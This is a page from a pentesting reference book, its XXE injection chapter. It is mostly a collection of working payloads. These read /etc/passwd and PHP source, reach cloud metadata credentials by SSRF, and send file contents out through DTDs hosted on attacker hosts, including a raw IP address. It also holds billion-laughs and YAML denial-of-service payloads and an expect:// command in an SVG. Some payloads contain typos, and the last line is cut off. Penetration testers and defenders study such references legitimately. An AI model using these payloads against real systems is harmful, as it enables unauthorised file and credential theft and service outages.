Pentest Book
Search…
/home/six2dez/.pentest-book
Contribute/Donate
Recon
Public info gathering
AIO Recon Tools
Domain Enum
Subdomain Enum
Network Scanning
Host Scanning
Packet Scanning
Enumeration
Files
SSL/TLS
Ports
Web Attacks
General Info
Quick tricks
Header injections
Bruteforcing
Online hashes cracked
Crawl/Fuzz
LFI/RFI
File upload
SQLi
SSRF
Open redirects
XSS
CSP
XXE
Cookie Padding
Webshells
CORS
CSRF
Web Cache Poisoning
Broken Links
Clickjacking
HTTP Request Smuggling
Web Sockets
CRLF
IDOR
Web Cache Deception
Session fixation
Email attacks
Pastejacking
HTTP Parameter pollution
SSTI
Prototype Pollution
Command Injection
Deserialization
Web Technologies
Cloud
Exploitation
Payloads
Reverse Shells
File transfer
Post Exploitation
Linux
Pivoting
Windows
Mobile
General
Android
iOS
Others
Burp Suite
Password cracking
VirtualBox
Code review
Pentesting Web checklist
Internal Pentest
Web fuzzers review
Recon suites review
Subdomain tools review
Random
Master assessment mindmaps
BugBounty
Exploiting
tools everywhere
Powered By GitBook
XXE

Summary

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access.
Detection:
1
# Content type "application/json" or "application/x-www-form-urlencoded" to "applcation/xml".
2
# File Uploads allows for docx/xlsx/pdf/zip, unzip the package and add your evil xml code into the xml files.
3
# If svg allowed in picture upload, you can inject xml in svgs.
4
# If the web app offers RSS feeds, add your milicious code into the RSS.
5
# Fuzz for /soap api, some applications still running soap apis
6
# If the target web app allows for SSO integration, you can inject your milicious xml code in the SAML request/reponse
Copied!
Check:
1
<?xml version="1.0"?>
2
<!DOCTYPE a [<!ENTITY test "THIS IS A STRING!">]>
3
<methodCall><methodName>&test;</methodName></methodCall>
Copied!
If works, then:
1
<?xml version="1.0"?>
2
<!DOCTYPE a[<!ENTITY test SYSTEM "file:///etc/passwd">]>
3
<methodCall><methodName>&test;</methodName></methodCall>
Copied!

Tools

1
# https://github.com/BuffaloWill/oxml_xxe
2
# https://github.com/enjoiz/XXEinjector
Copied!

Attacks

1
# Get PHP file:
2
<?xml version="1.0"?>
3
<!DOCTYPE a [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=index.php">]>
4
<methodCall><methodName>&test;</methodName></methodCall>
5
​
6
# Classic XXE Base64 encoded
7
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
8
​
9
# Check if entities are enabled
10
<!DOCTYPE replace [<!ENTITY test "pentest"> ]>
11
<root>
12
<xxe>&test;</xxe>
13
</root>
14
​
15
# XXE LFI:
16
<!DOCTYPE foo [
17
<!ELEMENT foo (#ANY)>
18
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
19
​
20
# XXE Blind LFI:
21
<!DOCTYPE foo [
22
<!ELEMENT foo (#ANY)>
23
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
24
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
25
​
26
# XXE Access control bypass
27
<!DOCTYPE foo [
28
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
29
<foo><result>&ac;</result></foo>
30
​
31
# XXE to SSRF:
32
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
33
​
34
# XXE OOB
35
<?xml version="1.0"?>
36
<!DOCTYPE data [
37
<!ENTITY % file SYSTEM "file:///etc/passwd">
38
<!ENTITY % dtd SYSTEM "http://your.host/remote.dtd">
39
%dtd;]>
40
<data>&send;</data>
41
​
42
# PHP Wrapper inside XXE
43
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
44
<contacts>
45
<contact>
46
<name>Jean &xxe; Dupont</name>
47
<phone>00 11 22 33 44</phone>
48
<adress>42 rue du CTF</adress>
49
<zipcode>75000</zipcode>
50
<city>Paris</city>
51
</contact>
52
</contacts>
53
​
54
<?xml version="1.0" encoding="ISO-8859-1"?>
55
<!DOCTYPE foo [
56
<!ELEMENT foo ANY >
57
<!ENTITY % xxe SYSTEM "php://filter/convert.bae64-encode/resource=http://10.0.0.3" >
58
]>
59
<foo>&xxe;</foo>
60
​
61
# Deny Of Service - Billion Laugh Attack
62
​
63
<!DOCTYPE data [
64
<!ENTITY a0 "dos" >
65
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
66
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
67
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
68
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
69
]>
70
<data>&a4;</data>
71
​
72
# Yaml attack
73
​
74
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
75
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
76
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
77
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
78
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
79
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
80
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
81
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
82
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
83
​
84
# XXE OOB Attack (Yunusov, 2013)
85
​
86
<?xml version="1.0" encoding="utf-8"?>
87
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
88
<data>&send;</data>
89
​
90
File stored on http://publicServer.com/parameterEntity_oob.dtd
91
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
92
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
93
%all;
94
​
95
# XXE OOB with DTD and PHP filter
96
​
97
<?xml version="1.0" ?>
98
<!DOCTYPE r [
99
<!ELEMENT r ANY >
100
<!ENTITY % sp SYSTEM "http://92.222.81.2/dtd.xml">
101
%sp;
102
%param1;
103
]>
104
<r>&exfil;</r>
105
​
106
File stored on http://92.222.81.2/dtd.xml
107
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
108
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://92.222.81.2/dtd.xml?%data;'>">
109
​
110
# XXE Inside SOAP
111
​
112
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
113
​
114
# XXE PoC
115
​
116
<!DOCTYPE xxe_test [ <!ENTITY xxe_test SYSTEM "file:///etc/passwd"> ]><x>&xxe_test;</x>
117
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe_test [ <!ENTITY xxe_test SYSTEM "file:///etc/passwd"> ]><x>&xxe_test;</x>
118
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe_test [<!ELEMENT foo ANY><!ENTITY xxe_test SYSTEM "file:///etc/passwd">]><foo>&xxe_test;</foo>
119
​
120
# XXE file upload SVG
121
<svg>&xxe;</svg>
122
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
123
<image xlink:href="expect://ls"></image>
124
</svg>
125
​
126
<?xml version="1.0" encdoing="UTF-8" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="512px" height="512px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="14" x="0" y="16">&xxe;</text></svg>
127
​
128
# XXE Hidden Attack
129
​
130
- Xinclude
131
​
132
Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.
133
Set the value of the productId parameter to:
134
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
135
​
136
- File uploads:
137
​
138
Create a local SVG image with the following content:
139
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
140
Post a comment on a blog post, and upload this image as an avatar.
141
When you view your comment, you should see the contents of the /etc/hostname file in your image. Then use the "Submit solution" but
Copied!

Mindmap

Previous
CSP
Next
Cookie Padding
Last modified 4mo ago
Export as PDF
Copy link
Contents
Summary
Tools
Attacks
Mindmap